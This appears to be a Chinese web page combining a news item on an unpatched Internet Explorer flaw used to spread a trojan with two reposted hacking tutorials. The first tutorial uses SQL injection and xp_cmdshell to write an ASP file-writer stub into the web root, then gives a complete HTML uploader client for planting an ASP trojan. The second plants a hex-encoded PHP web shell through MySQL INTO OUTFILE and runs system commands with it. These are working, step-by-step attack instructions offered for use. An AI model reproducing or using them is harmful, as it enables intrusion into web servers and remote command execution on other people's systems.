黑客利用IE缺陷传播木马 可完全控制用户PC

美国当地时间本周二晚些时候，微软警告称，黑客正在利用一个尚未修正的IE缺陷对用户发动攻击。

据微软称，利用该缺陷向“有免疫缺陷”的计算机上下载特洛伊木马病毒的恶意软件已经在互联网上现身。微软最近发布的在线安全扫描工具已经具备了扫描和删除TrojanDownloader：Win32/Delf.DH 的能力。

微软在更新的安全公告中说，用户可以访问Windows Live Safety Center，利用“完全扫描”（Complete Scan ）选项扫描、清除该恶意代码及其未来的变种。

这一缺陷在5 月份就被报告给了微软。最初，它被认为只能导致拒绝服务攻击，IE被关闭。但是，安全专家上周提高了它的威胁等级，因为它被发现能够用来在有缺陷的计算机上远程地运行软件。

据安全公告中，微软还没有发布补丁软件，但正在加紧开发相应的补丁软件。安全监测厂商Secunia 将该缺陷的危险等级评定为“极度危急”。

受到该缺陷影响的操作系统包括Windows 98、Windows ME、Windows 2000、Windows XP。通过在一个网站上托管恶意软件，黑客可以完全地控制用户的计算机，一旦用户访问该网站，恶意代码就会在没有用户“参与”的情况下在用户的计算机上运行。

微软提供了数种临时性解决方案，其中包括调整IE的设置，禁止运行活动脚本或在运行这类脚本前提醒用户。
 SQL注入与ASP木马上传

SQL注入与ASP木马上传

SQL注入后，如何上传木马，一[color=blue][/color]直是比较头疼的事，我这里提供上传木马的一种另一种方法。1、SQL注入的时候，用xp_cmdshell 向服务器上写入一个能写文件的asp文件。文件内容：<%Set objFSO = Server.createObject("Scripting.FileSystemObject")Set objCountFile=objFSO.createTextFile(request("mypath"),True)objCountFile.Write request("mydata")objCountFile.Close%>这个文件可以写成一行 <%Set objFSO = Server.createObject("Scripting.FileSystemObject"):Set objCountFile=objFSO.createTextFile(request("mypath"),True):objCountFile.Write request("mydata"):objCountFile.Close%>将特殊字符进行编码 就可以得到 %3C%25Set%20objFSO%20=%20Server.createObject(%22Scripting.FileSystemObject%22):Set%20objCountFile=objFSO.createTextFile(request(%22mypath%22),True):objCountFile.Write%20request(%22mydata%22):objCountFile.Close%25%3E注入（这里假定web目录是C:\Inetpub\wwwroot\）： exec master..xp_cmdshell 'echo "%3C%25Set%20objFSO%20=%20Server.createObject(%22Scripting.FileSystemObject%22):Set%20objCountFile=objFSO.createTextFile(request(%22mypath%22),True):objCountFile.Write%20request(%22mydata%22):objCountFile.Close%25%3E" > C:\Inetpub\wwwroot\ftp.asp';这样 在服务器的web 目录下 将生成一个 ftp.asp文件该文件的代码为<%Set objFSO = Server.createObject("Scripting.FileSystemObject")Set objCountFile=objFSO.createTextFile(request("mypath"),True)objCountFile.Write request("mydata")objCountFile.Close%>你可以看到，上面代码中预留了两个接口 mypath 和 mydatamypath是下次提交的时候 文件的生成路径mydata是文件的内容在本地编写一个客户端文件 例：RohuClient.htm 代码如下<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>肉鸡文件生成器--客户端 制作：绝对零度 QQ:12216796</title><style type="text/css"><!--TD {FONT-SIZE: 9pt; LINE-HEIGHT: 150%}BODY {FONT-SIZE: 12px;FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif, 宋体;SCROLLBAR-FACE-COLOR: #eeeeee; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #dee3e7; SCROLLBAR-3DLIGHT-COLOR: #d1d7dc; SCROLLBAR-ARROW-COLOR: #006699; SCROLLBAR-TRACK-COLOR: #ededed; SCROLLBAR-DARKSHADOW-COLOR: #98aab1}A:link {FONT-SIZE: 9pt; COLOR: #363636; LINE-HEIGHT: 18px; TEXT-DECORATION: none}A:visited {FONT-SIZE: 9pt; COLOR: #363636; LINE-HEIGHT: 18px; TEXT-DECORATION: none}A:hover {COLOR: #cc0000; LINE-HEIGHT: 18px; TEXT-DECORATION: underline}input,select,TEXTAREA {font-family: "tahoma", "arial", "helvetica", "sans-serif", "宋体";background-color: #f9f9f9; font-size: 9pt ; border: 1px #d2d2d2 dobble;line-height:120%;}--></style></head><script language="javascript" type="text/javascript">function chk(theform){if(theform.ftpUrl.value==''){alert('请输入递交的地址！');theform.ftpUrl.focus();return false;}if(theform.MyPath.value==''){alert('请输入生成文件的位置！');theform.MyPath.focus();return false;}if(theform.MyData.value==''){alert('请输入生成文件的内容！');theform.MyData.focus();return false;}theform.action=theform.ftpUrl.value;}</script><body><form name="RohuForm" method="post" action="" onSubmit="return chk(this)" target="_blank"><table width="673" border="0" align="center" cellpadding="0" cellspacing="0"><tr><td width="11%">目标位置：</td><td width="79%"><input name="ftpUrl" type="text" id="ftpUrl" size="50">例：http://127.0.0.1/FTP.ASP<;/td></tr><tr><td>生成文件：</td><td><input name="MyPath" type="text" id="MyPath">将在服务器上，生成的文件路径。例：C:\Inetpub\wwwroot erver.asp </td></tr><tr><td valign="top">文件代码：</td><td><textarea name="MyData" cols="100" rows="10" id="textarea"></textarea></td></tr><tr><td> </td><td><input type="submit" name="Submit" value="提交"></td></tr></table><br></form><table width="100%" border="0" cellspacing="0" cellpadding="0"><tr><td align="center">版权所有：绝对零度（<a href="http://www.rohu.com";>虎盟</a>）</td></tr></table></body></html>在目标位置栏填上刚刚生成的ftp.asp文件的url地址 如 http://127.0.0.1/ftp.asp （这里假设服务器的ip是 127.0.0.1）在生成文件栏 输入将在服务器上生成的文件名 比如：C:\Inetpub\wwwroot erver.asp 在文件内容里 ，随意的粘贴一个asp代码 点递交，当http://127.0.0.1/ftp.asp 文件执行完毕 基本上服务器上的asp木马就生成了。浏览 http://127.0.0.1/Server.ASP 呵呵 服务器就是你的了Hoky: 这篇文章前段时间不知道在那个地方看过.转贴的时候就没有写作者是谁.我也不记得了

通过Mysql 的语句生成后门木马的方法! SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php' 通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着: [color=blue][/color] 2 3 <?php system($_REQUEST[cmd]);?> 再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就可以执行系统DOS命令! 哪串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么东西? 就是<?php system($_REQUEST[cmd]);?>的十六进制编码了,如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行的了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!